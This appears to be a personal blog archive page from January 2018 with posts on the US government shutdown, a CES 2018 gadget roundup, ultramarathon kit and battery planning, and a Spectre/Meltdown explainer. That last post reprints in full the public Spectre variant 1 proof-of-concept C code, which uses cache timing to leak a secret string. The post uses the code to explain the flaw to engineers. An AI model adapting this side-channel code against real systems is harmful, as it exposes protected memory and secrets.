Sunday, January 21, 2018

Sunday Shutdown




Yung Fume: It's a Shutdown

Whilst researching some appropriate music to headline the Government Shutdown just enacted in the United States.

In fact the ugly music and juvenille lyrics seem quite ghastly and therefore most appropriate in the circumstances.


Spend Spend
It's my understanding the Republican Trump administration is using classic, rather left wing type Spend Spend Spend,  Print Print Print financial policy.  Trump wants to cut taxes  (i.e. Government Revenue),   build large Public Works e.g. a Wall  (increase Government Spending)  and so widen the gap between money coming in and money going out.

This is classic economic theory and it all works out splendidly if people start to beleve the hype and start Spending and Producing more,  oh and at the same time if the consuming can be non domestic, assuming your goods are competitive in the World marketplace, then this assists further.


Blame Who?
Donald Trump gave this advice on the previous shutdown.

Fox News commentator: "Who's going to take the blame Donald? Boardroom here—who's getting fired? Who is bearing the brunt of the responsibility, if indeed there is a shutdown of our government?"

Donald Trump: "Well, if you say who gets fired it always has to be the top.

I mean, problems start from the top and they have to get solved from the top and the President is the leader and he's got to get everybody in a room and he's gotta lead...

You know the interesting thing is in, uhh, 25 years, in 50 years, in a 100 years from now, when the government, you know, they talk about the government shutdown, they're gonna be talking about the President of the United States.

Who was the President at that time?

They're not gonna be talking about who the head of the House was, the head of the Senate, who's running things in Washington...

So, I really think the pressure is on the President."



What is the Shutdown?
Wikipedia is a good place to start here

https://en.wikipedia.org/wiki/Government_shutdowns_in_the_United_States

A  Google Search is here

What actually happens



A Year Already
The shutdown coincides with a year of the Trump administration

I'd encourage everyone that can,  to watch the BBC Panorama program called

Trump Voters: One Year On

Quote:
Donald Trump has changed the face of American politics, but what do the people who voted for him make of his tumultuous first year in office? Filmed over a year in Michigan, Wyoming, Texas and Florida, this programme hears from Trump supporters who hoped that he would 'make America great again'. But with so much promised, Panorama asks whether his supporters are still happy and if they would vote for him again





Guardian: One Year Trump



Trump remarks







Fox: Trumps Accomplishments

Fox: Trump is Winning :-)

And don't forget in the coming week Donald Trump comes to the World Economic Forum in Davos Switzerland.




Saturday, January 20, 2018

Late CES 2018 Report

You may recall that Marcus and Agata spent New Year 2017 running in California and then attending CES.  Our 2017 reports start here

For 2018 we resorted to being armchair attendees and this is our considered summary.  In the articles below, well click on the links for further details whenever I could find it.

Noteworthy

DJI Osmo Mobile 2




For anybody and everybody wanting to shoot a stabilised video your time has finally arrived.  At the <150 USD price point, simply buy one now.  I mean everybody!


Razer Project Linda





Adds a screen and keyboard to your Razer Phone.  Assuming it is ever released then lets hope all future Razer phones are the same size or smaller so as to fit into the dock!  (Linus review here)



New Dell XPS15 and Spectre X360



Verge review here

New even more powerful 15" laptops with very thin bezels. 



QNAP Storage





QNAP promised an IoT server last year but I never saw it so I was a little lukewarm about something similar in 2018  Meanwhile the new Be range of NAS assuming lowered pricing does look exciting.  It's a pity there are only 2 and 4 bay models.  If they had a 6 or 8 bay Be model at a friendly price then this would literally outrank all others.


Gigabyte X470 Motherboard






Boards to support AMD's second generation Ryzen CPU, as yet unannounced are starting to appear.  Ryzen has pushed Intel into action as AMD's price performance stole a march on Intels' traditional (and rather slow) upgrade cycle.



Aggregate M2 SSD


Rather than talk about Kingston 6TB Enterprise SSD  which I don't find  interesting due to the U.2 interface I'd rather promote the AsRock Ultra Quad M.2 Card.

So for about 2K GBP plus the cost of this card (surely not much) you could have a 4TB,  8GByte/second Disk array.


At CES Asrock did not declare wither the PCIe x 16 needs to be split into x4 on the card or by the Motherboard.   I'd assume the latter so you need to check the BIOS to see whether this is supported on your system.


Synaptics Under Screen



Until I have no choice I will currently prefer to own a smartphone with a fingerprint sensor on the back, since 99% of the time I get my phone out and naturally put my finger on the back to unlock the phone.  A sensor on the front under the class would be bloody irritating for me.


LG Rollable TV
Interesting future technology demo.




Yamaha Balancing Motorbike MOTOROiD





Byton Concept EV




Don't get too excited.  Concept Promises and features proclaimed at any event may not be feasible or possible at retail pricing :-)



Drones



Some secrets about drones:  Electric drones will never be able to carry any significantly heavy package over any distance.  Battery Technology, the Laws of Gravity and simple Maths can prove that.


But on the plus side, once you've tried a modern generation Drone it is easy to become hooked.  There is downward price movement over time but still you need to pay about 800 GBP or thereabout for the Drone, Controller, Batteries, Case etc.  Way above impulse buy territory IMHO.

I'd check Lok's DJI Spark video if you want to take the plunge and buy something not too expensive today.

Marcus and Agata would love a drone that can do a 2 hour follow me run, at HD or above resolution, with Smartphone control, and that fits into a small rucksack and is less than 2Kg, for less than 500 GBP.  Anybody?  No because we are nowhere close to that  (DJI Spark battery is 16 minutes)







Drone Rush: Best Drones CES



Expensiveo / Useless
Every large manufacturer needs a High End flagship that points the way forward.   Just that today's high end Speakers, Headphones, Televisions and Cars remind Marcus of how impoverished I seem to be!  Who exactly buys a 3000+ USD pair of headphones?  Or a 100K+ USD Televison.



Big expensive TV's



I so don't care about expensive high end TV's mostly because new standards and incompatibilities keep appearing in the TV space meaning your 2018 purchase may be invalidated in just one year.   (At home our Samsung 2017 TV does not support the right HDR for BBC transmissions, I am a personal victim already, and not just the first time.  Remember 3D?)



Robots



Since CES is about Consumer Electronics then I find none of the Robots displayed are really fit for consumer purpose except as a novelty.  Still eventually we will get there, but I'd give it another 20 years at least.  

In the longer term Sophia looks more interesting.




The Power Outage




On Wednesday North and Central Halls experienced a Power Outage.   Nobody went crazy, it was not terrorism and it was reported sanely.



Far Out

Hyperloop 1 test


Reports from Bloggers and Tech J
Android Police Best CES
Android Police CES Wrap Up
Austin Evans CES 2018
CES Day2  tech
Engadget CES 2018MKBHD: Dope Tech of CES 2018


Part 1   Part 2


Verge CES 2018 Awards


And Finally
I have the full text PDF magazines for CES 2018.  A lot of reading

CES Daily 2018 Day 1
CES Daily 2018 Day 2
CES Daily 2018 Day 3
CES Daily 2018 Day 4






Friday, January 19, 2018

UltraMarathon Race Preparation




Today Marcus will be talking about some of the preparations we are making to attempt to run a long UltraMarathon (> 100Km) in adverse conditions, possibly rain, snow and very probably dangerously windy conditions

At the Limit

Depending your level of Fitness and athletic ability anybody can enter a Race and be fit for work the next day.   It becomes more problematic when you enter a competition that is above your usual level in which case complications can include

- Injury

- Did Not Finish
- Finish but wrecked for next Week or Longer (and unable to Work/ other)


Our Expectations for our Race

- To not die   (sic)

- To Finish the Ultramarathon, which has time limits at Checkpoints, so for example we can't just walk
- To be injury free and able to function and smile and work the next day
- Marcus of course intends to document the whole event, so he needs extra fitness/coordination for the photography and video shooting during the event, plus a plan to manage the electronics


The Kit List


GPS tracker compulsory supplied and attached to your pack at registration.

Quality waterproof jacket (taped/sealed seams. Minimum 10k HH waterproofing)

Quality waterproof trousers (taped/sealed seams)

Long tights / leg cover

Warm hat

Water resistant peak cap (only needed if no peak on waterproof jacket)

Buff

Emergency survival bag (suitable to provide full body cover) (pictured)



1x base layer (minimum)

Whistle

Mobile phone (fully charged and in a waterproof case)

2x head torches each with spare batteries (minimum 100 lumens each)

Red tail light (to be switched on and worn on back of pack at all times)

2x sets of gloves. Liner and waterproof / Goretex type

Capacity to carry minimum 1.5 litres of water

Food / Nutrition

Rucksack


Outline simple route guide showing checkpoints and cut-offs and safety information (you will be issued a copy of this at registration and your support crew can also have a copy).



Weight and Water


Marcus did one of many test Packs and then a test run to match.  Not all items are quite there yet, notably 2 extra batteries but right now we are looking at 3.6Kg total weight including 2Kg (2 litres of water).

Basically it's all about the water!


In the UltraMarathon we'll undertake the Greatest Distance between checkpoints is 3 times almost 40Km (39.5, 38.6 and 35Km)  and so how much water you need to carry is a function of


- Weather conditions  (Hot means more water)

- General weather (Summer or Winter)
- Exertion  (Hills and Bad terrain or smooth asphalt)
- Your Body Effiency

Marcus tested his steady state requirements in Winter at < 0.5L per 20Km.So Marcus and Agata each need to carry at least 1 Litre of Water, probably 1.5L to be safe, and in case I meet another running who needs assistance.


1.5L of water is 1.5Kg, and this will be about 50% of total rucksack weight.  Nevertheless you just can't skimp on this detail!




Some Testing Huh!



Kit Testing

The initial  training plan was to run with only 4, 500 gram porridge bags.  I use my famous Coop Organic Swiss Porridge.  However it's not as dense as water and I found it did not fit!



Normal running loads ended up with a 1.5L  (1.5Kg) water bladder,  2 x 500g Porridge, + 500ml Front flask + Rucksack + Phone + Emergency Bag + Clothes, coming to about 3.6Kg

Based on the prior water analysis I can cut back the water by 500ml and save 0.5Kg.



Montane Running Jacket, with taped seams and < 150 grams






Fully clothed and ready to go.    Thermal Under Armour trousers, may not use in race, unless the weather will also be 6 degrees and dry   (it could be as low as -ve degrees C and snowing / sleeting and high winds are already expected)

Saucony Pergrine Ice shoes, reviewed favourably here


Ultimate Direction Peter Bakwin vest, excellent, reviewed here

Electronics Testing
On the competition Marcus needs

- Smartphone for photographs and Videos
- 2 Head torches and 4 batteries
- Music Player
- Bluetooth Headphones?

We need to calculate the worst case scenario of lighting required.   Assuming Lights are needed from 18.00 to 06.00 and the race starts at 12.00 and lasts 32 hours.   So we will need 12 hours + 2 hours = 14 hours.

Not all our Electronics will last the distance so during the race the idea is to charge up using a PowerBank.  For this we need to check charging rates on Devices to see if it will work

Petzl Nao Headtorch
4hr battery setting, actually lasted 5 hours.


Charge  rate 5V, 0.51 Ampere
+12% in 30 mins, +35% in 90 mins. 
Full charge Nao battery from powerbank in  260 minutes

Petzl Tikka RXP headtorch 
4 hr battery setting,  actually lasted 4 hours
Charge Rate 5V, 0.54 Ampere
Charge time < than for Nao

Huawei P9 Plus Smartphone
Charge rate 1 Ampere via special USBC charge cable

At time of writing current drain is in excess of 300mA meaning the phone will not even last 12 hours.   Needs analysis to find the problem and then fix it


Garmin 935 Watch
-10% in 66 minutes activity, so should last about 10 hours running
Need 32 especially since this Watch will carry the GPS route.
Charge Rate 0.16 Ampere or less
+10% charge < 10 minutes!

Full charge watch in 100 minutes

Strategy is that I will let it drain to 50% at which point I need to take off watch and place on charger and continue running.  Meanwhile Agata will keep her watch on.   Once rmy Garmin is echarged to 100% I will put my watch on and she will recharge her Garmin.


Mini 7 Bluetooth Headphone
Music time is about 2.5 hours

I am considering using wired headphones.  Whilst they restrict mobility and are annoying they don't need constant recharging.

I am also consider resurrecting my Apple Nano to give an easy 16 hours of music play so that the Smartphone will not be used for that.  I would have liked to use the Mighty Player xN but I can't justify the cost.




Recharging How
This is the current 10400 mAh Powerbank.  It's slightly heavy at 230 grams so a 135gram Anker 6700 mAh Powercore II is on order.

The overall recharging plan is

- Take enough Headtorch batteries so no recharging will be required.  Swap 2 batteries at halfway checkpoint where you can have a prepacked bag waiting.

- Used Wired headphones to avoid headphone swaps every few hours

- Use Powerbank to keep Smartphone charged.  Smartphone will be used for Photography and video and live posting if the weather is dry

Run Testing


For the last two weeks we have been running at load and using the clothing that we intend to use on the day.

And during the last month we have been out running it cold and difficult conditions to hopefully prepare us for adverse weather on the day.


In Summary
When you are attempting a non trivial race, and for Marcus and Agata we rate this forthcoming trivial as very difficult, we need to make our best preparation.

We now have most of the kit bought, and we've tested the kit and our running abilities on a daily basis

Getting the Electronics and Batteries right will be tricky but doable

We think we have planned Water correctly for the Marathon like distances between checkpoints.

We have booked a one week intensive training camp to get our fitness up higher

We make it a priority not to get injured between now and our race!

After the training camp we will be even more ready to race.  Let's hope we succeed.  TBC.


Thursday, January 18, 2018

Spectre and Meltdown



Spectre and Meltdown

Subtitle:  My Head Hurts

Real Engineers, we have all been there.  You get a call from the CTO  (Chief Technical Officer) or CIO  (Chief Information Officer) ...

They want to know in dumbass terms what these Spectre and Meltdown problems are all about

What Not to Do

You could tell them to read the official documentation here https://spectreattack.com/

But you know if they downloaded the papers on 

Meltdown
Spectre 

then it might lead to more questions than answers.


You Understand It
Of course you have read the Wikipedia entry

https://en.wikipedia.org/wiki/Spectre_(security_vulnerability)

You have noted that any CPU with Speculative Execution is vulnerable.  So initially AMD were thought to be in the clear, and IBM did not mention anything about POWER architecture vulnerabilities.   But now they do now.  Example  

IBM
https://www.servethehome.com/ibm-power-confirmed-impacted-security-design-flaws/

You have read the papers linked about and you also compiled up the following program on your modern X64 system to test it out



Some Code for your X64

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {
  1,
  2,
  3,
  4,
  5,
  6,
  7,
  8,
  9,
  10,
  11,
  12,
  13,
  14,
  15,
  16
};
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "Big Fat Mouse lived in a Very Tiny House";

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
  static int results[256];
  int tries, i, j, k, mix_i, junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t * addr;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {

    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size);
      for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */
      victim_function(x);

    }

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      time1 = __rdtscp( & junk); /* READ TIMER */
      junk = * addr; /* MEMORY ACCESS TO TIME */
      time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
      if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }

    /* Locate highest & second-highest results results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  }
  results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}

int main(int argc,
  const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2];

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void * * )( & malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", & len);
  }

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    printf("0x%02X=’%c’ score=%d ", value[0],
      (value[0] > 31 && value[0] < 127 ? value[0] : '?' ), score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  return (0);
}


I got the code from here  and corrected 2 trivial errors, so obviously take my edit!



Compile and Run




So The String that should be inaccessible is

Big Fat Mouse lived in a Very Tiny House

But as you can see it is found by looking into the CPU cache.

Current State of Play
You should understand the Vulnerability and have a simple, join the dots explanation for when the CIO CTO call you for a status

The Above Computerphile video is quite straightforward for example

OS vendors are trying to implement a software workaround. In view of some already enormous cockups (see here) you are going to test any patch on development systems well before pushing to production.

And since no Web Client Javascript et al exploit has yet been published then for now Web Based applications are safe and you have time to get your fix right, not immediate and wrong.




Some Ways Forward
- As above do rigorous testing of any fixes that you push from development to QA and finally to production.

- Wait for major vendors to redesign their CPU hardware (personally I see no idea how)

- Wait for somebody to understand what Google Retpoline fix is all about, because that fix is performance hit free(ish)




Links
Why Raspberry Pi is not affected